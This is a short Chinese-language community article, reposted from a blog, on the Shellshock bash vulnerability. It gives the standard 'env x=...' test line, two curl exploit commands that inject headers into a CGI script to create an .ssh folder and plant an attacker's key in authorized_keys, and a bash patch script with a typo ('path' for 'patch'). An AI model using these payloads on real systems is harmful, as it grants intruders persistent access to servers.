AI 助理
备案控制台
开发者社区 安全 文章 正文

shellshock漏洞利用

2018-02-28 1293
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396347 ...
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396347 
echo $shell
#查看当前用户的shell 

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
#定义了一个名字叫x的变量,内容时单引号内的。

exploit:

curl -H 'x: () { :;};a='/bin/mkdir /var/www/.ssh';echo "a: $a"' 'http://www.example.com/cgi-bin/test.cgi' -I

curl -H 'x: () { :;};a='/bin/echo "rsa公钥" > /var/www/.ssh/authorized_keys';echo "a: $a"' 'http://www.example.com/cgi-bin/test.cgi' -I

修复漏洞脚本:

#!/bin/bash
yum -y update && yum -y install build-essential gettext bison

wget http://ftp.gnu.org/gnu/bash/bash-3.2.tar.gz
tar -zxvf bash-3.2.tar.gz
cd bash-3.2

for i in $(seq -f "%03g" 1 53);
do
wget -nv http://ftp.gnu.org/gnu/bash/bash-3/gnu/bash/bash-3.2-patches/bash32-$i
path -p0 < bash32-$i
done
文章标签:
Shell
安全
网络安全
z奶油面包
目录
相关文章
sumith
|
6月前
|
安全 数据安全/隐私保护
CSRF漏洞利用工具 -- CSRFTester
CSRF漏洞利用工具 -- CSRFTester
sumith
246 0
sumith
|
6月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
sumith
68 0
XError_xiaoyu
|
6月前
|
SQL 监控 安全
记第一次eudsrc拿到RCE(上)
本文是一篇关于网络安全的漏洞分析报告,首先声明所有漏洞已修复,并警告读者不得用于非法活动。文章介绍了通过信息收集和复现研究,发现了一个CLI命令注入和RCE漏洞。这两个漏洞分别存在于登录页面的用户输入和后台接口中,允许攻击者执行恶意命令。作者提供了POC(Proof of Concept)代码,并展示了如何利用这些漏洞。最后,给出了修复建议,包括更新设备固件、加强访问控制、限制不必要的服务等,并强调了持续学习和关注安全公告的重要性。
XError_xiaoyu
56 0
XError_xiaoyu
|
6月前
|
安全 JavaScript 测试技术
记第一次eudsrc拿到RCE(下)
本文是关于网络安全的漏洞测试报告。作者强调所有漏洞已上报并修复,提醒读者不得用于非法目的。文章介绍了三种类型的漏洞:信息泄露、任意文件读取和远程命令执行(RCE)。通过前台CLI命令执行漏洞获取管理员密码后,发现了后台的任意文件读取和RCE漏洞。最后,提出了修复建议,包括限制文件访问、严格验证用户输入以及避免不安全的编程实践。鼓励持续学习和细心观察,以发现潜在的安全问题。
XError_xiaoyu
40 0
云梦吖
|
XML 安全 数据格式
pikachu靶场通过秘籍之XXE漏洞攻击
pikachu靶场通过秘籍之XXE漏洞攻击
云梦吖
179 0
小白渗透测试
|
安全 网络安全 Windows
渗透测试-使用metasploit的evasion模块生成后门木马
渗透测试-使用metasploit的evasion模块生成后门木马
小白渗透测试
209 0
渗透测试-使用metasploit的evasion模块生成后门木马
游客mgyx2kmo6h5zo
|
XML 安全 NoSQL
SSRF漏洞详细讲解
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。...
游客mgyx2kmo6h5zo
421 0
z奶油面包
|
安全 Perl
heartbleed漏洞利用
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396350 心脏滴血漏洞。
z奶油面包
1051 0
玄学酱
|
安全 Shell Linux
ShellShock这点事
玄学酱
1753 0
技术小阿哥
|
安全 数据安全/隐私保护
DVBBS 8.2 漏洞利用
技术小阿哥
1324 0